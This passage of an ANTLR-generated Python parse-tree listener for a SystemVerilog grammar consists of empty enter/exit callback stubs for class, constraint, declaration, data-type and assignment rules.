    def enterClass_method(self, ctx:SystemVerilogParser.Class_methodContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#class_method.
    def exitClass_method(self, ctx:SystemVerilogParser.Class_methodContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#class_constructor_prototype.
    def enterClass_constructor_prototype(self, ctx:SystemVerilogParser.Class_constructor_prototypeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#class_constructor_prototype.
    def exitClass_constructor_prototype(self, ctx:SystemVerilogParser.Class_constructor_prototypeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#class_constraint.
    def enterClass_constraint(self, ctx:SystemVerilogParser.Class_constraintContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#class_constraint.
    def exitClass_constraint(self, ctx:SystemVerilogParser.Class_constraintContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#class_item_qualifier.
    def enterClass_item_qualifier(self, ctx:SystemVerilogParser.Class_item_qualifierContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#class_item_qualifier.
    def exitClass_item_qualifier(self, ctx:SystemVerilogParser.Class_item_qualifierContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#property_qualifier.
    def enterProperty_qualifier(self, ctx:SystemVerilogParser.Property_qualifierContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#property_qualifier.
    def exitProperty_qualifier(self, ctx:SystemVerilogParser.Property_qualifierContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#random_qualifier.
    def enterRandom_qualifier(self, ctx:SystemVerilogParser.Random_qualifierContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#random_qualifier.
    def exitRandom_qualifier(self, ctx:SystemVerilogParser.Random_qualifierContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#method_qualifier.
    def enterMethod_qualifier(self, ctx:SystemVerilogParser.Method_qualifierContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#method_qualifier.
    def exitMethod_qualifier(self, ctx:SystemVerilogParser.Method_qualifierContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#method_prototype.
    def enterMethod_prototype(self, ctx:SystemVerilogParser.Method_prototypeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#method_prototype.
    def exitMethod_prototype(self, ctx:SystemVerilogParser.Method_prototypeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#class_constructor_declaration.
    def enterClass_constructor_declaration(self, ctx:SystemVerilogParser.Class_constructor_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#class_constructor_declaration.
    def exitClass_constructor_declaration(self, ctx:SystemVerilogParser.Class_constructor_declarationContext):
        pass
    # --- Constraint / dist rule callbacks -----------------------------------
    # NOTE(review): ANTLR-generated no-op listener stubs. Regenerating the
    # grammar overwrites this file; put custom logic in a subclass override.
    # Enter a parse tree produced by SystemVerilogParser#constraint_declaration.
    def enterConstraint_declaration(self, ctx:SystemVerilogParser.Constraint_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#constraint_declaration.
    def exitConstraint_declaration(self, ctx:SystemVerilogParser.Constraint_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#constraint_block.
    def enterConstraint_block(self, ctx:SystemVerilogParser.Constraint_blockContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#constraint_block.
    def exitConstraint_block(self, ctx:SystemVerilogParser.Constraint_blockContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#constraint_block_item.
    def enterConstraint_block_item(self, ctx:SystemVerilogParser.Constraint_block_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#constraint_block_item.
    def exitConstraint_block_item(self, ctx:SystemVerilogParser.Constraint_block_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#solve_before_list.
    def enterSolve_before_list(self, ctx:SystemVerilogParser.Solve_before_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#solve_before_list.
    def exitSolve_before_list(self, ctx:SystemVerilogParser.Solve_before_listContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#constraint_primary.
    def enterConstraint_primary(self, ctx:SystemVerilogParser.Constraint_primaryContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#constraint_primary.
    def exitConstraint_primary(self, ctx:SystemVerilogParser.Constraint_primaryContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#constraint_expression.
    def enterConstraint_expression(self, ctx:SystemVerilogParser.Constraint_expressionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#constraint_expression.
    def exitConstraint_expression(self, ctx:SystemVerilogParser.Constraint_expressionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#uniqueness_constraint.
    def enterUniqueness_constraint(self, ctx:SystemVerilogParser.Uniqueness_constraintContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#uniqueness_constraint.
    def exitUniqueness_constraint(self, ctx:SystemVerilogParser.Uniqueness_constraintContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#constraint_set.
    def enterConstraint_set(self, ctx:SystemVerilogParser.Constraint_setContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#constraint_set.
    def exitConstraint_set(self, ctx:SystemVerilogParser.Constraint_setContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#dist_list.
    def enterDist_list(self, ctx:SystemVerilogParser.Dist_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#dist_list.
    def exitDist_list(self, ctx:SystemVerilogParser.Dist_listContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#dist_item.
    def enterDist_item(self, ctx:SystemVerilogParser.Dist_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#dist_item.
    def exitDist_item(self, ctx:SystemVerilogParser.Dist_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#dist_weight.
    def enterDist_weight(self, ctx:SystemVerilogParser.Dist_weightContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#dist_weight.
    def exitDist_weight(self, ctx:SystemVerilogParser.Dist_weightContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#constraint_prototype.
    def enterConstraint_prototype(self, ctx:SystemVerilogParser.Constraint_prototypeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#constraint_prototype.
    def exitConstraint_prototype(self, ctx:SystemVerilogParser.Constraint_prototypeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#constraint_prototype_qualifier.
    def enterConstraint_prototype_qualifier(self, ctx:SystemVerilogParser.Constraint_prototype_qualifierContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#constraint_prototype_qualifier.
    def exitConstraint_prototype_qualifier(self, ctx:SystemVerilogParser.Constraint_prototype_qualifierContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#extern_constraint_declaration.
    def enterExtern_constraint_declaration(self, ctx:SystemVerilogParser.Extern_constraint_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#extern_constraint_declaration.
    def exitExtern_constraint_declaration(self, ctx:SystemVerilogParser.Extern_constraint_declarationContext):
        pass
    # --- Identifier-list / package-item / anonymous-program rule callbacks --
    # NOTE(review): ANTLR-generated no-op listener stubs. Regenerating the
    # grammar overwrites this file; put custom logic in a subclass override.
    # Enter a parse tree produced by SystemVerilogParser#identifier_list.
    def enterIdentifier_list(self, ctx:SystemVerilogParser.Identifier_listContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#identifier_list.
    def exitIdentifier_list(self, ctx:SystemVerilogParser.Identifier_listContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#package_item.
    def enterPackage_item(self, ctx:SystemVerilogParser.Package_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#package_item.
    def exitPackage_item(self, ctx:SystemVerilogParser.Package_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#package_or_generate_item_declaration.
    def enterPackage_or_generate_item_declaration(self, ctx:SystemVerilogParser.Package_or_generate_item_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#package_or_generate_item_declaration.
    def exitPackage_or_generate_item_declaration(self, ctx:SystemVerilogParser.Package_or_generate_item_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#anonymous_program.
    def enterAnonymous_program(self, ctx:SystemVerilogParser.Anonymous_programContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#anonymous_program.
    def exitAnonymous_program(self, ctx:SystemVerilogParser.Anonymous_programContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#anonymous_program_item.
    def enterAnonymous_program_item(self, ctx:SystemVerilogParser.Anonymous_program_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#anonymous_program_item.
    def exitAnonymous_program_item(self, ctx:SystemVerilogParser.Anonymous_program_itemContext):
        pass
    # --- Parameter / port / data / net / type declaration rule callbacks ----
    # NOTE(review): ANTLR-generated no-op listener stubs. Regenerating the
    # grammar overwrites this file; put custom logic in a subclass override.
    # Enter a parse tree produced by SystemVerilogParser#local_parameter_declaration.
    def enterLocal_parameter_declaration(self, ctx:SystemVerilogParser.Local_parameter_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#local_parameter_declaration.
    def exitLocal_parameter_declaration(self, ctx:SystemVerilogParser.Local_parameter_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#parameter_declaration.
    def enterParameter_declaration(self, ctx:SystemVerilogParser.Parameter_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#parameter_declaration.
    def exitParameter_declaration(self, ctx:SystemVerilogParser.Parameter_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#specparam_declaration.
    def enterSpecparam_declaration(self, ctx:SystemVerilogParser.Specparam_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#specparam_declaration.
    def exitSpecparam_declaration(self, ctx:SystemVerilogParser.Specparam_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#inout_declaration.
    def enterInout_declaration(self, ctx:SystemVerilogParser.Inout_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#inout_declaration.
    def exitInout_declaration(self, ctx:SystemVerilogParser.Inout_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#input_declaration.
    def enterInput_declaration(self, ctx:SystemVerilogParser.Input_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#input_declaration.
    def exitInput_declaration(self, ctx:SystemVerilogParser.Input_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#output_declaration.
    def enterOutput_declaration(self, ctx:SystemVerilogParser.Output_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#output_declaration.
    def exitOutput_declaration(self, ctx:SystemVerilogParser.Output_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#interface_port_declaration.
    def enterInterface_port_declaration(self, ctx:SystemVerilogParser.Interface_port_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#interface_port_declaration.
    def exitInterface_port_declaration(self, ctx:SystemVerilogParser.Interface_port_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#ref_declaration.
    def enterRef_declaration(self, ctx:SystemVerilogParser.Ref_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#ref_declaration.
    def exitRef_declaration(self, ctx:SystemVerilogParser.Ref_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#data_declaration.
    def enterData_declaration(self, ctx:SystemVerilogParser.Data_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#data_declaration.
    def exitData_declaration(self, ctx:SystemVerilogParser.Data_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#package_import_declaration.
    def enterPackage_import_declaration(self, ctx:SystemVerilogParser.Package_import_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#package_import_declaration.
    def exitPackage_import_declaration(self, ctx:SystemVerilogParser.Package_import_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#package_import_item.
    def enterPackage_import_item(self, ctx:SystemVerilogParser.Package_import_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#package_import_item.
    def exitPackage_import_item(self, ctx:SystemVerilogParser.Package_import_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#package_export_declaration.
    def enterPackage_export_declaration(self, ctx:SystemVerilogParser.Package_export_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#package_export_declaration.
    def exitPackage_export_declaration(self, ctx:SystemVerilogParser.Package_export_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#genvar_declaration.
    def enterGenvar_declaration(self, ctx:SystemVerilogParser.Genvar_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#genvar_declaration.
    def exitGenvar_declaration(self, ctx:SystemVerilogParser.Genvar_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#net_declaration.
    def enterNet_declaration(self, ctx:SystemVerilogParser.Net_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#net_declaration.
    def exitNet_declaration(self, ctx:SystemVerilogParser.Net_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#type_declaration.
    def enterType_declaration(self, ctx:SystemVerilogParser.Type_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#type_declaration.
    def exitType_declaration(self, ctx:SystemVerilogParser.Type_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#net_type_declaration.
    def enterNet_type_declaration(self, ctx:SystemVerilogParser.Net_type_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#net_type_declaration.
    def exitNet_type_declaration(self, ctx:SystemVerilogParser.Net_type_declarationContext):
        pass
    # --- Data-type / strength / delay rule callbacks ------------------------
    # NOTE(review): ANTLR-generated no-op listener stubs. Regenerating the
    # grammar overwrites this file; put custom logic in a subclass override.
    # Enter a parse tree produced by SystemVerilogParser#lifetime.
    def enterLifetime(self, ctx:SystemVerilogParser.LifetimeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#lifetime.
    def exitLifetime(self, ctx:SystemVerilogParser.LifetimeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#data_type.
    def enterData_type(self, ctx:SystemVerilogParser.Data_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#data_type.
    def exitData_type(self, ctx:SystemVerilogParser.Data_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#data_type_or_implicit.
    def enterData_type_or_implicit(self, ctx:SystemVerilogParser.Data_type_or_implicitContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#data_type_or_implicit.
    def exitData_type_or_implicit(self, ctx:SystemVerilogParser.Data_type_or_implicitContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#implicit_data_type.
    def enterImplicit_data_type(self, ctx:SystemVerilogParser.Implicit_data_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#implicit_data_type.
    def exitImplicit_data_type(self, ctx:SystemVerilogParser.Implicit_data_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#enum_base_type.
    def enterEnum_base_type(self, ctx:SystemVerilogParser.Enum_base_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#enum_base_type.
    def exitEnum_base_type(self, ctx:SystemVerilogParser.Enum_base_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#enum_name_declaration.
    def enterEnum_name_declaration(self, ctx:SystemVerilogParser.Enum_name_declarationContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#enum_name_declaration.
    def exitEnum_name_declaration(self, ctx:SystemVerilogParser.Enum_name_declarationContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#class_scope.
    def enterClass_scope(self, ctx:SystemVerilogParser.Class_scopeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#class_scope.
    def exitClass_scope(self, ctx:SystemVerilogParser.Class_scopeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#class_type.
    def enterClass_type(self, ctx:SystemVerilogParser.Class_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#class_type.
    def exitClass_type(self, ctx:SystemVerilogParser.Class_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#integer_type.
    def enterInteger_type(self, ctx:SystemVerilogParser.Integer_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#integer_type.
    def exitInteger_type(self, ctx:SystemVerilogParser.Integer_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#integer_atom_type.
    def enterInteger_atom_type(self, ctx:SystemVerilogParser.Integer_atom_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#integer_atom_type.
    def exitInteger_atom_type(self, ctx:SystemVerilogParser.Integer_atom_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#integer_vector_type.
    def enterInteger_vector_type(self, ctx:SystemVerilogParser.Integer_vector_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#integer_vector_type.
    def exitInteger_vector_type(self, ctx:SystemVerilogParser.Integer_vector_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#non_integer_type.
    def enterNon_integer_type(self, ctx:SystemVerilogParser.Non_integer_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#non_integer_type.
    def exitNon_integer_type(self, ctx:SystemVerilogParser.Non_integer_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#net_type.
    def enterNet_type(self, ctx:SystemVerilogParser.Net_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#net_type.
    def exitNet_type(self, ctx:SystemVerilogParser.Net_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#net_port_type.
    def enterNet_port_type(self, ctx:SystemVerilogParser.Net_port_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#net_port_type.
    def exitNet_port_type(self, ctx:SystemVerilogParser.Net_port_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#variable_port_type.
    def enterVariable_port_type(self, ctx:SystemVerilogParser.Variable_port_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#variable_port_type.
    def exitVariable_port_type(self, ctx:SystemVerilogParser.Variable_port_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#var_data_type.
    def enterVar_data_type(self, ctx:SystemVerilogParser.Var_data_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#var_data_type.
    def exitVar_data_type(self, ctx:SystemVerilogParser.Var_data_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#signing.
    def enterSigning(self, ctx:SystemVerilogParser.SigningContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#signing.
    def exitSigning(self, ctx:SystemVerilogParser.SigningContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#simple_type.
    def enterSimple_type(self, ctx:SystemVerilogParser.Simple_typeContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#simple_type.
    def exitSimple_type(self, ctx:SystemVerilogParser.Simple_typeContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#struct_union_member.
    def enterStruct_union_member(self, ctx:SystemVerilogParser.Struct_union_memberContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#struct_union_member.
    def exitStruct_union_member(self, ctx:SystemVerilogParser.Struct_union_memberContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#data_type_or_void.
    def enterData_type_or_void(self, ctx:SystemVerilogParser.Data_type_or_voidContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#data_type_or_void.
    def exitData_type_or_void(self, ctx:SystemVerilogParser.Data_type_or_voidContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#struct_union.
    def enterStruct_union(self, ctx:SystemVerilogParser.Struct_unionContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#struct_union.
    def exitStruct_union(self, ctx:SystemVerilogParser.Struct_unionContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#type_reference.
    def enterType_reference(self, ctx:SystemVerilogParser.Type_referenceContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#type_reference.
    def exitType_reference(self, ctx:SystemVerilogParser.Type_referenceContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#drive_strength.
    def enterDrive_strength(self, ctx:SystemVerilogParser.Drive_strengthContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#drive_strength.
    def exitDrive_strength(self, ctx:SystemVerilogParser.Drive_strengthContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#strength0.
    def enterStrength0(self, ctx:SystemVerilogParser.Strength0Context):
        pass
    # Exit a parse tree produced by SystemVerilogParser#strength0.
    def exitStrength0(self, ctx:SystemVerilogParser.Strength0Context):
        pass
    # Enter a parse tree produced by SystemVerilogParser#strength1.
    def enterStrength1(self, ctx:SystemVerilogParser.Strength1Context):
        pass
    # Exit a parse tree produced by SystemVerilogParser#strength1.
    def exitStrength1(self, ctx:SystemVerilogParser.Strength1Context):
        pass
    # Enter a parse tree produced by SystemVerilogParser#charge_strength.
    def enterCharge_strength(self, ctx:SystemVerilogParser.Charge_strengthContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#charge_strength.
    def exitCharge_strength(self, ctx:SystemVerilogParser.Charge_strengthContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#delay3.
    def enterDelay3(self, ctx:SystemVerilogParser.Delay3Context):
        pass
    # Exit a parse tree produced by SystemVerilogParser#delay3.
    def exitDelay3(self, ctx:SystemVerilogParser.Delay3Context):
        pass
    # Enter a parse tree produced by SystemVerilogParser#delay2.
    def enterDelay2(self, ctx:SystemVerilogParser.Delay2Context):
        pass
    # Exit a parse tree produced by SystemVerilogParser#delay2.
    def exitDelay2(self, ctx:SystemVerilogParser.Delay2Context):
        pass
    # Enter a parse tree produced by SystemVerilogParser#delay_value.
    def enterDelay_value(self, ctx:SystemVerilogParser.Delay_valueContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#delay_value.
    def exitDelay_value(self, ctx:SystemVerilogParser.Delay_valueContext):
        pass
    # --- list_of_* rule callbacks -------------------------------------------
    # NOTE(review): ANTLR-generated no-op listener stubs. Regenerating the
    # grammar overwrites this file; put custom logic in a subclass override.
    # Enter a parse tree produced by SystemVerilogParser#list_of_defparam_assignments.
    def enterList_of_defparam_assignments(self, ctx:SystemVerilogParser.List_of_defparam_assignmentsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_defparam_assignments.
    def exitList_of_defparam_assignments(self, ctx:SystemVerilogParser.List_of_defparam_assignmentsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_genvar_identifiers.
    def enterList_of_genvar_identifiers(self, ctx:SystemVerilogParser.List_of_genvar_identifiersContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_genvar_identifiers.
    def exitList_of_genvar_identifiers(self, ctx:SystemVerilogParser.List_of_genvar_identifiersContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_interface_identifiers.
    def enterList_of_interface_identifiers(self, ctx:SystemVerilogParser.List_of_interface_identifiersContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_interface_identifiers.
    def exitList_of_interface_identifiers(self, ctx:SystemVerilogParser.List_of_interface_identifiersContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_net_decl_assignments.
    def enterList_of_net_decl_assignments(self, ctx:SystemVerilogParser.List_of_net_decl_assignmentsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_net_decl_assignments.
    def exitList_of_net_decl_assignments(self, ctx:SystemVerilogParser.List_of_net_decl_assignmentsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_param_assignments.
    def enterList_of_param_assignments(self, ctx:SystemVerilogParser.List_of_param_assignmentsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_param_assignments.
    def exitList_of_param_assignments(self, ctx:SystemVerilogParser.List_of_param_assignmentsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_port_identifiers.
    def enterList_of_port_identifiers(self, ctx:SystemVerilogParser.List_of_port_identifiersContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_port_identifiers.
    def exitList_of_port_identifiers(self, ctx:SystemVerilogParser.List_of_port_identifiersContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_udp_port_identifiers.
    def enterList_of_udp_port_identifiers(self, ctx:SystemVerilogParser.List_of_udp_port_identifiersContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_udp_port_identifiers.
    def exitList_of_udp_port_identifiers(self, ctx:SystemVerilogParser.List_of_udp_port_identifiersContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_specparam_assignments.
    def enterList_of_specparam_assignments(self, ctx:SystemVerilogParser.List_of_specparam_assignmentsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_specparam_assignments.
    def exitList_of_specparam_assignments(self, ctx:SystemVerilogParser.List_of_specparam_assignmentsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_tf_variable_identifiers.
    def enterList_of_tf_variable_identifiers(self, ctx:SystemVerilogParser.List_of_tf_variable_identifiersContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_tf_variable_identifiers.
    def exitList_of_tf_variable_identifiers(self, ctx:SystemVerilogParser.List_of_tf_variable_identifiersContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_type_assignments.
    def enterList_of_type_assignments(self, ctx:SystemVerilogParser.List_of_type_assignmentsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_type_assignments.
    def exitList_of_type_assignments(self, ctx:SystemVerilogParser.List_of_type_assignmentsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_variable_decl_assignments.
    def enterList_of_variable_decl_assignments(self, ctx:SystemVerilogParser.List_of_variable_decl_assignmentsContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_variable_decl_assignments.
    def exitList_of_variable_decl_assignments(self, ctx:SystemVerilogParser.List_of_variable_decl_assignmentsContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_variable_identifiers.
    def enterList_of_variable_identifiers(self, ctx:SystemVerilogParser.List_of_variable_identifiersContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_variable_identifiers.
    def exitList_of_variable_identifiers(self, ctx:SystemVerilogParser.List_of_variable_identifiersContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#list_of_variable_port_identifiers.
    def enterList_of_variable_port_identifiers(self, ctx:SystemVerilogParser.List_of_variable_port_identifiersContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#list_of_variable_port_identifiers.
    def exitList_of_variable_port_identifiers(self, ctx:SystemVerilogParser.List_of_variable_port_identifiersContext):
        pass
    # --- Assignment / new-expression rule callbacks -------------------------
    # NOTE(review): ANTLR-generated no-op listener stubs. Regenerating the
    # grammar overwrites this file; put custom logic in a subclass override.
    # Enter a parse tree produced by SystemVerilogParser#defparam_assignment.
    def enterDefparam_assignment(self, ctx:SystemVerilogParser.Defparam_assignmentContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#defparam_assignment.
    def exitDefparam_assignment(self, ctx:SystemVerilogParser.Defparam_assignmentContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#net_decl_assignment.
    def enterNet_decl_assignment(self, ctx:SystemVerilogParser.Net_decl_assignmentContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#net_decl_assignment.
    def exitNet_decl_assignment(self, ctx:SystemVerilogParser.Net_decl_assignmentContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#param_assignment.
    def enterParam_assignment(self, ctx:SystemVerilogParser.Param_assignmentContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#param_assignment.
    def exitParam_assignment(self, ctx:SystemVerilogParser.Param_assignmentContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#specparam_assignment.
    def enterSpecparam_assignment(self, ctx:SystemVerilogParser.Specparam_assignmentContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#specparam_assignment.
    def exitSpecparam_assignment(self, ctx:SystemVerilogParser.Specparam_assignmentContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#type_assignment.
    def enterType_assignment(self, ctx:SystemVerilogParser.Type_assignmentContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#type_assignment.
    def exitType_assignment(self, ctx:SystemVerilogParser.Type_assignmentContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#pulse_control_specparam.
    def enterPulse_control_specparam(self, ctx:SystemVerilogParser.Pulse_control_specparamContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#pulse_control_specparam.
    def exitPulse_control_specparam(self, ctx:SystemVerilogParser.Pulse_control_specparamContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#error_limit_value.
    def enterError_limit_value(self, ctx:SystemVerilogParser.Error_limit_valueContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#error_limit_value.
    def exitError_limit_value(self, ctx:SystemVerilogParser.Error_limit_valueContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#reject_limit_value.
    def enterReject_limit_value(self, ctx:SystemVerilogParser.Reject_limit_valueContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#reject_limit_value.
    def exitReject_limit_value(self, ctx:SystemVerilogParser.Reject_limit_valueContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#limit_value.
    def enterLimit_value(self, ctx:SystemVerilogParser.Limit_valueContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#limit_value.
    def exitLimit_value(self, ctx:SystemVerilogParser.Limit_valueContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#variable_decl_assignment.
